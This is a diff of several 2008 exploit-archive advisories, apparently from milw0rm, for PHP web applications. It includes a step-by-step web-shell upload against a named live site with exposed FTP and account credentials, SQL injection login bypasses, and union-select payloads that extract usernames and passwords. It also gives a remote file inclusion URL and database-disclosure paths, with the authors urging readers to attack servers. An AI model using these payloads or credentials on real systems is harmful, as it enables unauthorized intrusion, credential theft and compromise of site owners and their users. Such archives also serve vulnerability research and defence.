icin: - -ftp://ftp.ababy.com.au/ ( ftp pass ve username ) - -user: kiddybab - -pass: KidEw1nk08 - -ne biliyim iste biseler yapmaya calIsIn amacIm yardImcý olmak yoksa isterseniz hemen hackleyin isterseniz kurcalayIn siz bilirsiniz ;) - - -first register for site - -after login to site and edit profile ( direck lnk: http://www.lcfarticles.com/user.modify.profile.php ) - -click to gozat button and select your shell after upload you shell - -more after go repat edit profile page and you look you photo. right click to you photo - -select to properties copy photo link and paste you explorer. 
- -go your shell - -examp: - -user: trt-turk@hotmail.com - -passwd: zorlu1 - -login: - -http://www.lcfarticles.com/user.login.php - -shell: - -http://www.lcfarticles.com//authorphoto/zorlu40.php - - -[~]---------------------------------------------------------------------- -[~] Greetz tO: str0ke & RedHaK -[~] -[~] yildirimordulari.org & darkc0de.com -[~] -[~]---------------------------------------------------------------------- - -# milw0rm.com [2008-11-27] +[~] Star Articles 6.0 Remote File Upload +[~] +[~] ---------------------------------------------------------- +[~] Discovered By: ZoRLu msn: trt-turk@hotmail.com +[~] +[~] Home: www.z0rlu.blogspot.com +[~] +[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( +[~] +[~] dork: allinurl:"article.download.php" ( baya bi site var ) +[~] +[~] N0T: pls dont make demos ( demolarI hacklemeyin LUTFEN kucuk bir rica ) +[~] ----------------------------------------------------------- + +expl: + +http://script//authorphoto/user_name[id].php + +example: + +http://www.lcfarticles.com//authorphoto/zorlu40.php ( according to me you dont make hack this site ) + +http://www.lcfarticles.com//authorphoto/zorlu40.php?act=ls&d=%2Fetc%2Fvdomainaliases ( server fena deil ) + +hemen hacklemeyin arkadaslar serverý kurcalayIn bakIn misal: + +http://www.lcfarticles.com//authorphoto/zorlu40.php?act=ls&d=%2Fhome%2Fkiddybab%2Fpublic_html%2F + +bir cok site var. ya rootlayýn yada tek tek cakýn config okuyun vs. 
serverdaki sitelerle ugrasmadan zone kasIlmaz ;) + +http://www.lcfarticles.com//authorphoto/zorlu40.php?act=ls&d=%2Fhome%2Fkiddybab%2Fpublic_html%2F + +bu serverdaki bir site icin: + +ftp://ftp.ababy.com.au/ ( ftp pass ve username ) + +user: kiddybab + +pass: KidEw1nk08 + +ne biliyim iste biseler yapmaya calIsIn amacIm yardImcý olmak yoksa isterseniz hemen hackleyin isterseniz kurcalayIn siz bilirsiniz ;) + + +first register for site + +after login to site and edit profile ( direck lnk: http://www.lcfarticles.com/user.modify.profile.php ) + +click to gozat button and select your shell after upload you shell + +more after go repat edit profile page and you look you photo. right click to you photo + +select to properties copy photo link and paste you explorer. + +go your shell + +examp: + +user: trt-turk@hotmail.com + +passwd: zorlu1 + +login: + +http://www.lcfarticles.com/user.login.php + +shell: + +http://www.lcfarticles.com//authorphoto/zorlu40.php + + +[~]---------------------------------------------------------------------- +[~] Greetz tO: str0ke & RedHaK +[~] +[~] yildirimordulari.org & darkc0de.com +[~] +[~]---------------------------------------------------------------------- + +# milw0rm.com [2008-11-27] diff --git a/platforms/php/webapps/7252.txt b/platforms/php/webapps/7252.txt index ccf473e2d..75d576055 100755 --- a/platforms/php/webapps/7252.txt +++ b/platforms/php/webapps/7252.txt 
@@ -1,70 +1,70 @@ -*********************************************************************************************************************************************************** -[!] [!] -[!] OOOO O OOOOOOOOO [!] -[!] O O O O O [!] -[!] O O O [!] -[!] O OOOO OOOO OOOOOO OOOO OOO OO O OOOO OO OO OOOO [!] -[!] O OOO OOO O O O O OO O O O O OO O O O [!] -[!] O OO OO O O OOOOOO O ******* O O O O O OOOOOO [!] -[!] O O OOOO O O O O O O O O O O O [!] -[!] OOOO OO OOOOOO OOOO OOOOOO OOOOOOOOO OOOO OOO OOO OOOO [!] -[!] OO [!] -[!] OO [!] -[!] OO Proud To Be MoroCCaN [!] -[!] OO WwW.Exploiter5.CoM , WwW.No-Exploit.CoM , WwW.IQ-TY.CoM [!] -*********************************************************************************************************************************************************** -+---- Bismi Allah Irahmani ArraHim ----+ -++--------------------------------------------------------------------------------------------------------------------------------------------------------+ -++ [ Web Calendar Pro 4.1 (Auth Bypass) SQL Injection Vulnerability ] ++ -+--------------------------------------------------------------------------------------------------------------------------------------------------------++ -: Author : Cyber-Zone ( Abdelkhalek ) : : : -¦ E-MaiL : Paradis_des_fous[at]hotmail[dot]fr ¦ ¦ ¦ -¦ Home : WwW.IQ-Ty.CoM ¦ ¦ MySQL Version Is : ¦ -¦ From : MoroCCo ¦ ¦ ¦ -¦ Script : http://www.web-calendar-pro.com ¦ ¦ ![ ]! 
¦ -¦ Download : http://www.web-calendar-pro.com/order-now.html ¦ ¦ ¦ -¦ RisK : High [¦¦¦¦¦¦¦¦] ¦ ¦ ¦ -¦ --------------------------------------------------------------------------------------------------------+ +-------------------------------------- ¦ -¦ From The Dark Side Of MoroCCo ++ -+--------------------------------------------------------------------------------------------------------------------------------------------------------++ -: : -¦ Remember : ¦ -¦ ------------- ¦ -¦ ¦ -¦ This information is only for educational purpose, Cyber-Zone will not bear responsibility for any damages. ¦ -¦ ¦ - -++--------------------------------------------------------------------------------------------------------------------------------------------------------+ -++ [!] Fi Khater Mgharba wahed wahed , Kima tayGol Khoya JiKo , Ana Maghribi , Ana Arabi , Ana Muslim , Jib L3azz Awela K7azz [!] ++ -+--------------------------------------------------------------------------------------------------------------------------------------------------------++ - - -This is a simple (Auth Bypass) :) - -just login with this informations : - -Username : admin ' or ' 1=1 -Password : Cyber-Zone or any thing - -This is a demo To Try : - -http://demo.web-calendar-pro.com/admin.php - - -Yeaaaaaaaaaaaah Loged In :) - -Fi Khater Alfarkha dyali :) - -Raha Nayda Nooood - - - -+--------------------------------------------------------------------------------------------------------------------------------------------------------++ -+---- ThanX To ----+ -++--------------------------------------------------------------------------------------------------------------------------------------------------------+ -++[ $ Hussin X , $ StaCk , $ JIKO , $ The_5p3cTrum , $ BayHay , $ CraCKEr , $ Oujda-Lord , $ GeneraL , $ Force-Major , $ WaLid , $ Oujda & Figuig City ]++ 
-+--------------------------------------------------------------------------------------------------------------------------------------------------------++ -= [AttaCk Is CompLet] = -___________________________________________________________________________________________________________________________________________________________ - -# milw0rm.com [2008-11-27] +*********************************************************************************************************************************************************** +[!] [!] +[!] OOOO O OOOOOOOOO [!] +[!] O O O O O [!] +[!] O O O [!] +[!] O OOOO OOOO OOOOOO OOOO OOO OO O OOOO OO OO OOOO [!] +[!] O OOO OOO O O O O OO O O O O OO O O O [!] +[!] O OO OO O O OOOOOO O ******* O O O O O OOOOOO [!] +[!] O O OOOO O O O O O O O O O O O [!] +[!] OOOO OO OOOOOO OOOO OOOOOO OOOOOOOOO OOOO OOO OOO OOOO [!] +[!] OO [!] +[!] OO [!] +[!] OO Proud To Be MoroCCaN [!] +[!] OO WwW.Exploiter5.CoM , WwW.No-Exploit.CoM , WwW.IQ-TY.CoM [!] +*********************************************************************************************************************************************************** ++---- Bismi Allah Irahmani ArraHim ----+ +++--------------------------------------------------------------------------------------------------------------------------------------------------------+ +++ [ Web Calendar Pro 4.1 (Auth Bypass) SQL Injection Vulnerability ] ++ ++--------------------------------------------------------------------------------------------------------------------------------------------------------++ +: Author : Cyber-Zone ( Abdelkhalek ) : : : +¦ E-MaiL : Paradis_des_fous[at]hotmail[dot]fr ¦ ¦ ¦ +¦ Home : WwW.IQ-Ty.CoM ¦ ¦ MySQL Version Is : ¦ +¦ From : MoroCCo ¦ ¦ ¦ +¦ Script : http://www.web-calendar-pro.com ¦ ¦ ![ ]! 
¦ +¦ Download : http://www.web-calendar-pro.com/order-now.html ¦ ¦ ¦ +¦ RisK : High [¦¦¦¦¦¦¦¦] ¦ ¦ ¦ +¦ --------------------------------------------------------------------------------------------------------+ +-------------------------------------- ¦ +¦ From The Dark Side Of MoroCCo ++ ++--------------------------------------------------------------------------------------------------------------------------------------------------------++ +: : +¦ Remember : ¦ +¦ ------------- ¦ +¦ ¦ +¦ This information is only for educational purpose, Cyber-Zone will not bear responsibility for any damages. ¦ +¦ ¦ + +++--------------------------------------------------------------------------------------------------------------------------------------------------------+ +++ [!] Fi Khater Mgharba wahed wahed , Kima tayGol Khoya JiKo , Ana Maghribi , Ana Arabi , Ana Muslim , Jib L3azz Awela K7azz [!] ++ ++--------------------------------------------------------------------------------------------------------------------------------------------------------++ + + +This is a simple (Auth Bypass) :) + +just login with this informations : + +Username : admin ' or ' 1=1 +Password : Cyber-Zone or any thing + +This is a demo To Try : + +http://demo.web-calendar-pro.com/admin.php + + +Yeaaaaaaaaaaaah Loged In :) + +Fi Khater Alfarkha dyali :) + +Raha Nayda Nooood + + + ++--------------------------------------------------------------------------------------------------------------------------------------------------------++ ++---- ThanX To ----+ +++--------------------------------------------------------------------------------------------------------------------------------------------------------+ +++[ $ Hussin X , $ StaCk , $ JIKO , $ The_5p3cTrum , $ BayHay , $ CraCKEr , $ Oujda-Lord , $ GeneraL , $ Force-Major , $ WaLid , $ Oujda & Figuig City ]++ 
++--------------------------------------------------------------------------------------------------------------------------------------------------------++ += [AttaCk Is CompLet] = +___________________________________________________________________________________________________________________________________________________________ + +# milw0rm.com [2008-11-27] diff --git a/platforms/php/webapps/7253.txt b/platforms/php/webapps/7253.txt index a5fd10706..37f77832e 100755 --- a/platforms/php/webapps/7253.txt +++ b/platforms/php/webapps/7253.txt 
@@ -1,38 +1,38 @@ - [~] ----------------------------بسم الله الرحمن الرحيم------------------------------ - [~]Tybe: (hotel_habitaciones.php HotelID) Remote SQL Injection Vulnerability - - [~]Vendor: www.bookingcentre.eu - - [~]Software: Hotels Group - - [~]author: ((я3d D3v!L)) - - [~] Date: 28.11.2008 - - [~] Home: www.ahacker.biz - - [~] contact: N/A - [~] ----------------------------------------------------------- - - - [~] Exploit: - - http://demo.hotelsadmin.com/www_en/hotel_habitaciones.php?HotelID=(SQL) - - - [~] (SQL): - - 1+union+select+concat_ws(0x3a,@@version,0x3a,user())-- - - [~]-------------------------------------------------------------------------------- - [~] Greetz tO: keta & m4n0n & maxmos & EV!L KS@ & hesham_hacker - [~] - [~] spechial thanks : dolly & 7am3m & عماد ,الزهيري - [~] - [~] EV!L !NS!D3 734M ---> R3d-D3v!L--EXOT!C --poison scorbion --samakiller - [~] - [~] xp10.biz & ahacker.biz - [~] - [~]-------------------------------------------------------------------------------- - -# milw0rm.com [2008-11-27] + [~] ----------------------------بسم الله الرحمن الرحيم------------------------------ + [~]Tybe: (hotel_habitaciones.php HotelID) Remote SQL Injection Vulnerability + + [~]Vendor: www.bookingcentre.eu + + [~]Software: Hotels Group + + [~]author: ((я3d D3v!L)) + + [~] Date: 28.11.2008 + + [~] Home: www.ahacker.biz + + [~] contact: N/A + [~] ----------------------------------------------------------- + + + [~] Exploit: + + http://demo.hotelsadmin.com/www_en/hotel_habitaciones.php?HotelID=(SQL) + + + [~] (SQL): + + 1+union+select+concat_ws(0x3a,@@version,0x3a,user())-- + + [~]-------------------------------------------------------------------------------- + [~] Greetz tO: keta & m4n0n & maxmos & EV!L KS@ & hesham_hacker + [~] + [~] spechial thanks : dolly & 7am3m & عماد ,الزهيري + [~] + [~] EV!L !NS!D3 734M ---> R3d-D3v!L--EXOT!C --poison scorbion --samakiller + [~] + [~] xp10.biz & ahacker.biz + [~] + 
[~]-------------------------------------------------------------------------------- + +# milw0rm.com [2008-11-27] diff --git a/platforms/php/webapps/7254.txt b/platforms/php/webapps/7254.txt index 2b6675be1..10b1d084e 100755 --- a/platforms/php/webapps/7254.txt +++ b/platforms/php/webapps/7254.txt 
@@ -1,68 +1,68 @@ -*********************************************************************************************************************************************************** -[!] [!] -[!] OOOO O OOOOOOOOO [!] -[!] O O O O O [!] -[!] O O O [!] -[!] O OOOO OOOO OOOOOO OOOO OOO OO O OOOO OO OO OOOO [!] -[!] O OOO OOO O O O O OO O O O O OO O O O [!] -[!] O OO OO O O OOOOOO O ******* O O O O O OOOOOO [!] -[!] O O OOOO O O O O O O O O O O O [!] -[!] OOOO OO OOOOOO OOOO OOOOOO OOOOOOOOO OOOO OOO OOO OOOO [!] -[!] OO [!] -[!] OO [!] -[!] OO Proud To Be MoroCCaN [!] -[!] OO Mor0ccan nightamres Will Be The Best The_5p3ctrum , BayHay & Me :) [!] -*********************************************************************************************************************************************************** - +---- Bismi Allah Irahmani ArraHim ----+ -++--------------------------------------------------------------------------------------------------------------------------------------------------------+ -++ [ Ocean12 Membership Manager Pro (Auth Bypass) SQL Injection Vulnerability ] ++ -+--------------------------------------------------------------------------------------------------------------------------------------------------------++ -: Author : Cyber-Zone ( Abdelkhalek) : : : -¦ E-MaiL : Paradis_des_fous[at]hotmail[dot]fr ¦ ¦ ¦ -¦ Home : WwW.IQ-Ty.CoM ¦ ¦ MySQL Version Is : ¦ -¦ TeaM : Mor0ccan nightamres ¦ ¦ ¦ -¦ Script : http://ocean12tech.com ¦ ¦ ![ ]! 
¦ -¦ Download : http://ocean12tech.com/products/membership/ ¦ ¦ ¦ -¦ RisK : High [¦¦¦¦¦¦¦¦] ¦ ¦ ¦ -¦ --------------------------------------------------------------------------------------------------------+ +-------------------------------------- ¦ -¦ From The Dark Side Of MoroCCo ++ -+--------------------------------------------------------------------------------------------------------------------------------------------------------++ -: : -¦ Remember : ¦ -¦ ------------- ¦ -¦ ¦ -¦ This information is only for educational purpose, Cyber-Zone will not bear responsibility for any damages. ¦ -¦ ¦ - -++--------------------------------------------------------------------------------------------------------------------------------------------------------+ -++ [!] Fi khater Ga3 Li TkarfasT 3liHom , Wali SabbiThom F IndeX Dyali , NabGhi NgoliHom : Rakom MaChafto WaLo , Wal9adimo Al3an [!] ++ -+--------------------------------------------------------------------------------------------------------------------------------------------------------++ - - -Bypass : ........ - -Go To The Admin Panel. -and Login with this information : - -username : admin ' or ' 1=1 -password : Cyber-Zone or any thing you want :) - -yeah bro you loged in dont worry :) - -and this is a live demo : - -http://ocean12tech.com/products/membership/demo/ - -EnjoY. 
- - - -+--------------------------------------------------------------------------------------------------------------------------------------------------------++ -+---- ThanX To ----+ -++--------------------------------------------------------------------------------------------------------------------------------------------------------+ -++[ $ Hussin X , $ StaCk , $ JIKO , $ The_5p3cTrum , $ BayHay , $ CraCKEr , $ Oujda-Lord , $ GeneraL , $ Force-Major , $ WaLid , $ Oujda & Figuig City ]++ -+--------------------------------------------------------------------------------------------------------------------------------------------------------++ -= [AttaCk Is CompLet] = -___________________________________________________________________________________________________________________________________________________________ - -# milw0rm.com [2008-11-27] +*********************************************************************************************************************************************************** +[!] [!] +[!] OOOO O OOOOOOOOO [!] +[!] O O O O O [!] +[!] O O O [!] +[!] O OOOO OOOO OOOOOO OOOO OOO OO O OOOO OO OO OOOO [!] +[!] O OOO OOO O O O O OO O O O O OO O O O [!] +[!] O OO OO O O OOOOOO O ******* O O O O O OOOOOO [!] +[!] O O OOOO O O O O O O O O O O O [!] +[!] OOOO OO OOOOOO OOOO OOOOOO OOOOOOOOO OOOO OOO OOO OOOO [!] +[!] OO [!] +[!] OO [!] +[!] OO Proud To Be MoroCCaN [!] +[!] OO Mor0ccan nightamres Will Be The Best The_5p3ctrum , BayHay & Me :) [!] 
+*********************************************************************************************************************************************************** + +---- Bismi Allah Irahmani ArraHim ----+ +++--------------------------------------------------------------------------------------------------------------------------------------------------------+ +++ [ Ocean12 Membership Manager Pro (Auth Bypass) SQL Injection Vulnerability ] ++ ++--------------------------------------------------------------------------------------------------------------------------------------------------------++ +: Author : Cyber-Zone ( Abdelkhalek) : : : +¦ E-MaiL : Paradis_des_fous[at]hotmail[dot]fr ¦ ¦ ¦ +¦ Home : WwW.IQ-Ty.CoM ¦ ¦ MySQL Version Is : ¦ +¦ TeaM : Mor0ccan nightamres ¦ ¦ ¦ +¦ Script : http://ocean12tech.com ¦ ¦ ![ ]! ¦ +¦ Download : http://ocean12tech.com/products/membership/ ¦ ¦ ¦ +¦ RisK : High [¦¦¦¦¦¦¦¦] ¦ ¦ ¦ +¦ --------------------------------------------------------------------------------------------------------+ +-------------------------------------- ¦ +¦ From The Dark Side Of MoroCCo ++ ++--------------------------------------------------------------------------------------------------------------------------------------------------------++ +: : +¦ Remember : ¦ +¦ ------------- ¦ +¦ ¦ +¦ This information is only for educational purpose, Cyber-Zone will not bear responsibility for any damages. ¦ +¦ ¦ + +++--------------------------------------------------------------------------------------------------------------------------------------------------------+ +++ [!] Fi khater Ga3 Li TkarfasT 3liHom , Wali SabbiThom F IndeX Dyali , NabGhi NgoliHom : Rakom MaChafto WaLo , Wal9adimo Al3an [!] ++ ++--------------------------------------------------------------------------------------------------------------------------------------------------------++ + + +Bypass : ........ + +Go To The Admin Panel. 
+and Login with this information : + +username : admin ' or ' 1=1 +password : Cyber-Zone or any thing you want :) + +yeah bro you loged in dont worry :) + +and this is a live demo : + +http://ocean12tech.com/products/membership/demo/ + +EnjoY. + + + ++--------------------------------------------------------------------------------------------------------------------------------------------------------++ ++---- ThanX To ----+ +++--------------------------------------------------------------------------------------------------------------------------------------------------------+ +++[ $ Hussin X , $ StaCk , $ JIKO , $ The_5p3cTrum , $ BayHay , $ CraCKEr , $ Oujda-Lord , $ GeneraL , $ Force-Major , $ WaLid , $ Oujda & Figuig City ]++ ++--------------------------------------------------------------------------------------------------------------------------------------------------------++ += [AttaCk Is CompLet] = +___________________________________________________________________________________________________________________________________________________________ + +# milw0rm.com [2008-11-27] diff --git a/platforms/php/webapps/7255.txt b/platforms/php/webapps/7255.txt index f1f413afe..42c95c0d2 100755 --- a/platforms/php/webapps/7255.txt +++ b/platforms/php/webapps/7255.txt 
@@ -1,45 +1,45 @@ -============================================================================================================= - - - [o] PageTree CMS 0.0.2 BETA 0001 Remote File Inclusion Vulnerability - - Software : PageTree CMS version 0.0.2 BETA 0001 - Vendor : http://pagetreecms.co.cc/ - Download : http://pagetree.googlecode.com/svn/trunk/ - Author : NoGe - Contact : noge[dot]code[at]gmail[dot]com - Blog : http://evilc0de.blogspot.com - - -============================================================================================================= - - - [o] Vulnerable file - - admin/plugins/Online_Users/main.php - - include($GLOBALS['PT_Config']['dir']['data']."content/1.php"); - - - - [o] Exploit - - http://localhost/[path]/admin/plugins/Online_Users/main.php?GLOBALS[PT_Config][dir][data]=[evilcode] - - -============================================================================================================= - - - [o] Greetz - - MainHack BrotherHood [ http://serverisdown.org/blog/] - Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa - H312Y yooogy mousekill }^-^{ kaka11 martfella - skulmatic olibekas ulga Cungkee k1tk4t str0ke - - GANYANG MALINGSIAL!!! 
[ http://malingsial.serverisdown.org/ ] - - -============================================================================================================= - -# milw0rm.com [2008-11-27] +============================================================================================================= + + + [o] PageTree CMS 0.0.2 BETA 0001 Remote File Inclusion Vulnerability + + Software : PageTree CMS version 0.0.2 BETA 0001 + Vendor : http://pagetreecms.co.cc/ + Download : http://pagetree.googlecode.com/svn/trunk/ + Author : NoGe + Contact : noge[dot]code[at]gmail[dot]com + Blog : http://evilc0de.blogspot.com + + +============================================================================================================= + + + [o] Vulnerable file + + admin/plugins/Online_Users/main.php + + include($GLOBALS['PT_Config']['dir']['data']."content/1.php"); + + + + [o] Exploit + + http://localhost/[path]/admin/plugins/Online_Users/main.php?GLOBALS[PT_Config][dir][data]=[evilcode] + + +============================================================================================================= + + + [o] Greetz + + MainHack BrotherHood [ http://serverisdown.org/blog/] + Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa + H312Y yooogy mousekill }^-^{ kaka11 martfella + skulmatic olibekas ulga Cungkee k1tk4t str0ke + + GANYANG MALINGSIAL!!! [ http://malingsial.serverisdown.org/ ] + + +============================================================================================================= + +# milw0rm.com [2008-11-27] diff --git a/platforms/php/webapps/7256.txt b/platforms/php/webapps/7256.txt index 51e5d0515..1e27ac684 100755 --- a/platforms/php/webapps/7256.txt +++ b/platforms/php/webapps/7256.txt 
@@ -1,44 +1,44 @@ -----------------Mor0ccan Nightmares---------------- - ------------------------------- -Script: Turnkey Arcade Script- ------------------------------- - ------------------------------------ -Site: http://www.turnkeyarcade.com- ------------------------------------ - ------------------------------------------------------------ -Author: The_5p3ctrum <sp3@linuxmail.org> <5p@linuxmail.org>- ------------------------------------------------------------ - - ------------------------------------------------------------------------ -Business Turnkey Arcade Script (index.php id) Remote SQL Vulnerability- ------------------------------------------------------------------------ ---- -Ex: ---- - -http://localhost/index.php?action=play&id=[sql] -http://localhost/index.php?action=play&id=-1+union+select+1,2,3,4,5,version(),7,8,9,10,11,12 from users - --------- -exploit: --------- - -http://localhost/index.php?action=play&id=-21+union+select+1,2,3,username,5,password,7,8,9,10,11,12 from users - ------ -Demo: ------ - -http://www.turnkeyarcade.com/demo/index.php?action=play&id=-21+union+select+1,2,3,username,5,password,7,8,9,10,11,12+from+users - -------- -Greetz: -------- - -Bayhay - Cyber-Zone - Drackanz - The_leo - The_Casper - Milw0rm and all my friends... 
- -# milw0rm.com [2008-11-27] +----------------Mor0ccan Nightmares---------------- + +------------------------------ +Script: Turnkey Arcade Script- +------------------------------ + +----------------------------------- +Site: http://www.turnkeyarcade.com- +----------------------------------- + +----------------------------------------------------------- +Author: The_5p3ctrum <sp3@linuxmail.org> <5p@linuxmail.org>- +----------------------------------------------------------- + + +----------------------------------------------------------------------- +Business Turnkey Arcade Script (index.php id) Remote SQL Vulnerability- +----------------------------------------------------------------------- +--- +Ex: +--- + +http://localhost/index.php?action=play&id=[sql] +http://localhost/index.php?action=play&id=-1+union+select+1,2,3,4,5,version(),7,8,9,10,11,12 from users + +-------- +exploit: +-------- + +http://localhost/index.php?action=play&id=-21+union+select+1,2,3,username,5,password,7,8,9,10,11,12 from users + +----- +Demo: +----- + +http://www.turnkeyarcade.com/demo/index.php?action=play&id=-21+union+select+1,2,3,username,5,password,7,8,9,10,11,12+from+users + +------- +Greetz: +------- + +Bayhay - Cyber-Zone - Drackanz - The_leo - The_Casper - Milw0rm and all my friends... + +# milw0rm.com [2008-11-27] diff --git a/platforms/php/webapps/7257.txt b/platforms/php/webapps/7257.txt index cdaff2634..fee67c1b9 100755 --- a/platforms/php/webapps/7257.txt +++ b/platforms/php/webapps/7257.txt 
@@ -1,47 +1,47 @@ -######################################################################### -#################### Viva IslaM Viva IslaM ############################## -## -## Remote SQL Injection Vulnerability -## -## BaSiC-CMS ( index.php r ) -## -######################################################################### -######################################################################### -## -## AuTh0r : Mr.SQL -## -## H0ME : WwW.PaL-HaCkEr.CoM -## -## Email : SQL@Hotmail.it -## -## !! SYRIAN HaCkErS !! -######################## -######################## -## -## Script : BaSiC-CMS -## -## site : www.Basic-CMS.de -## -######################## -######################## -## -## -(:: SQL ::)- -## -## www.site.com/pages/ -## index.php?r=&page_id=-74+union+select+1,1,1,convert(concat_ws(0x2F2A2A2F,version(),current_user,database())+using+latin1),1,1-- -## -## -(:: L!VE DEMO ::)- -## -## http://demo.basic-cms.de/pages/index.php?r=&page_id=-74+union+select+1,1,1,convert(concat_ws(0x2F2A2A2F,version(),current_user,database())+using+latin1),1,1-- -## -####################### -####################### - -####################################################################################################### -####################################################################################################### - -(:: !Gr3E3E3E3E3E3E3TzZ! 
::)- - :: HaCkEr-EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: HeBarieH :: MusliMs HaCkErs :: -####################################################################################################### -####################################################################################################### - -# milw0rm.com [2008-11-27] +######################################################################### +#################### Viva IslaM Viva IslaM ############################## +## +## Remote SQL Injection Vulnerability +## +## BaSiC-CMS ( index.php r ) +## +######################################################################### +######################################################################### +## +## AuTh0r : Mr.SQL +## +## H0ME : WwW.PaL-HaCkEr.CoM +## +## Email : SQL@Hotmail.it +## +## !! SYRIAN HaCkErS !! +######################## +######################## +## +## Script : BaSiC-CMS +## +## site : www.Basic-CMS.de +## +######################## +######################## +## +## -(:: SQL ::)- +## +## www.site.com/pages/ +## index.php?r=&page_id=-74+union+select+1,1,1,convert(concat_ws(0x2F2A2A2F,version(),current_user,database())+using+latin1),1,1-- +## +## -(:: L!VE DEMO ::)- +## +## http://demo.basic-cms.de/pages/index.php?r=&page_id=-74+union+select+1,1,1,convert(concat_ws(0x2F2A2A2F,version(),current_user,database())+using+latin1),1,1-- +## +####################### +####################### + +####################################################################################################### +####################################################################################################### + -(:: !Gr3E3E3E3E3E3E3TzZ! 
::)- + :: HaCkEr-EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: HeBarieH :: MusliMs HaCkErs :: +####################################################################################################### +####################################################################################################### + +# milw0rm.com [2008-11-27] diff --git a/platforms/php/webapps/7258.txt b/platforms/php/webapps/7258.txt index 203bbe0e6..e7583d9f7 100755 --- a/platforms/php/webapps/7258.txt +++ b/platforms/php/webapps/7258.txt @@ -1,15 +1,15 @@ -######################################################### ---------------------------------------------------------- -Portal Name: Ocean12 FAQ Manager Pro -Author : Mountassif Moad - Evil Finger / v4 Team -Vulnerability : Database Disclosure Vulnerability ---------------------------------------------------------- -######################################################### -XPL : -http://site.com/path//admin/o12faq.mdb -Demo : -http://ocean12tech.com/products/faq/demo/ -http://ocean12tech.com/products/faq/demo/admin/o12faq.mdb - -# milw0rm.com [2008-11-27] +######################################################### +--------------------------------------------------------- +Portal Name: Ocean12 FAQ Manager Pro +Author : Mountassif Moad + Evil Finger / v4 Team +Vulnerability : Database Disclosure Vulnerability +--------------------------------------------------------- +######################################################### +XPL : +http://site.com/path//admin/o12faq.mdb +Demo : +http://ocean12tech.com/products/faq/demo/ +http://ocean12tech.com/products/faq/demo/admin/o12faq.mdb + +# milw0rm.com [2008-11-27] diff --git a/platforms/php/webapps/7260.txt b/platforms/php/webapps/7260.txt index cf0759a9f..e0c4571e6 100755 --- a/platforms/php/webapps/7260.txt +++ b/platforms/php/webapps/7260.txt 
@@ -1,12 +1,12 @@ -######################################################### ---------------------------------------------------------- -Portal Name: Basic-cms (ASP) -D0wn : http://www.basic-cms.com/download-basiccms.zip -Author : Mountassif Moad - Evil Finger / v4 Team -Vulnerability : Database Disclosure Vulnerability ---------------------------------------------------------- -######################################################### -http://www.site.com/acm2000.mdb - -# milw0rm.com [2008-11-28] +######################################################### +--------------------------------------------------------- +Portal Name: Basic-cms (ASP) +D0wn : http://www.basic-cms.com/download-basiccms.zip +Author : Mountassif Moad + Evil Finger / v4 Team +Vulnerability : Database Disclosure Vulnerability +--------------------------------------------------------- +######################################################### +http://www.site.com/acm2000.mdb + +# milw0rm.com [2008-11-28] diff --git a/platforms/php/webapps/7261.txt b/platforms/php/webapps/7261.txt index 15d211662..d1a0ef3f7 100755 --- a/platforms/php/webapps/7261.txt +++ b/platforms/php/webapps/7261.txt 
@@ -1,69 +1,69 @@ -================================================================== - Basic PHP CMS (index.php id) Blind SQL Injection Vulnerability -================================================================== - - ,--^----------,--------,-----,-------^--, - | ||||||||| `--------' | O .. CWH Underground Hacking Team .. - `+---------------------------^----------| - `\_,-------, _________________________| - / XXXXXX /`| / - / XXXXXX / `\ / - / XXXXXX /\______( - / XXXXXX / - / XXXXXX / - (________( - `------' - - -AUTHOR : CWH Underground -DATE : 27 November 2008 -SITE : cwh.citec.us - - -##################################################### - APPLICATION : Basic PHP CMS - DOWNLOAD : http://www.content-management-software.us/basiccms.zip -##################################################### - ---- Blind SQL Injection --- - ------------------------------ - Vulnerable File (index.php) ------------------------------ - -if ($strID != "") -{ - $strsql = "SELECT description "; - $strsql .=" FROM pages_t_details "; - $strsql .=" WHERE id=$strID"; - $conclass =new DataBase(); - $rst= $conclass->Execute ($strsql,$strError); - if ($strError=="") - { - while ($line = mysql_fetch_array($rst, MYSQL_ASSOC)) - { - $strDetails=$line['description']; - } - } - -} - ---------- - Exploit ---------- - -Test Blind SQL Injection in MYSQL Version 5 - -True -[+] http://[Target]/[basiccms_path]/index.php?id=1 and substring(@@version,1,1)=5-- - -False -[+] http://[Target]/[basiccms_path]/index.php?id=1 and substring(@@version,1,1)=4-- - - -####################################################################################### -Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK -Special Thx : asylu3, str0ke, citec.us, milw0rm.com -####################################################################################### - -# milw0rm.com [2008-11-28] +================================================================== + Basic PHP CMS (index.php id) Blind SQL 
Injection Vulnerability +================================================================== + + ,--^----------,--------,-----,-------^--, + | ||||||||| `--------' | O .. CWH Underground Hacking Team .. + `+---------------------------^----------| + `\_,-------, _________________________| + / XXXXXX /`| / + / XXXXXX / `\ / + / XXXXXX /\______( + / XXXXXX / + / XXXXXX / + (________( + `------' + + +AUTHOR : CWH Underground +DATE : 27 November 2008 +SITE : cwh.citec.us + + +##################################################### + APPLICATION : Basic PHP CMS + DOWNLOAD : http://www.content-management-software.us/basiccms.zip +##################################################### + +--- Blind SQL Injection --- + +----------------------------- + Vulnerable File (index.php) +----------------------------- + +if ($strID != "") +{ + $strsql = "SELECT description "; + $strsql .=" FROM pages_t_details "; + $strsql .=" WHERE id=$strID"; + $conclass =new DataBase(); + $rst= $conclass->Execute ($strsql,$strError); + if ($strError=="") + { + while ($line = mysql_fetch_array($rst, MYSQL_ASSOC)) + { + $strDetails=$line['description']; + } + } + +} + +--------- + Exploit +--------- + +Test Blind SQL Injection in MYSQL Version 5 + +True +[+] http://[Target]/[basiccms_path]/index.php?id=1 and substring(@@version,1,1)=5-- + +False +[+] http://[Target]/[basiccms_path]/index.php?id=1 and substring(@@version,1,1)=4-- + + +####################################################################################### +Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK +Special Thx : asylu3, str0ke, citec.us, milw0rm.com +####################################################################################### + +# milw0rm.com [2008-11-28] diff --git a/platforms/php/webapps/7263.txt b/platforms/php/webapps/7263.txt index fba0b61a0..9c78a05eb 100755 --- a/platforms/php/webapps/7263.txt +++ 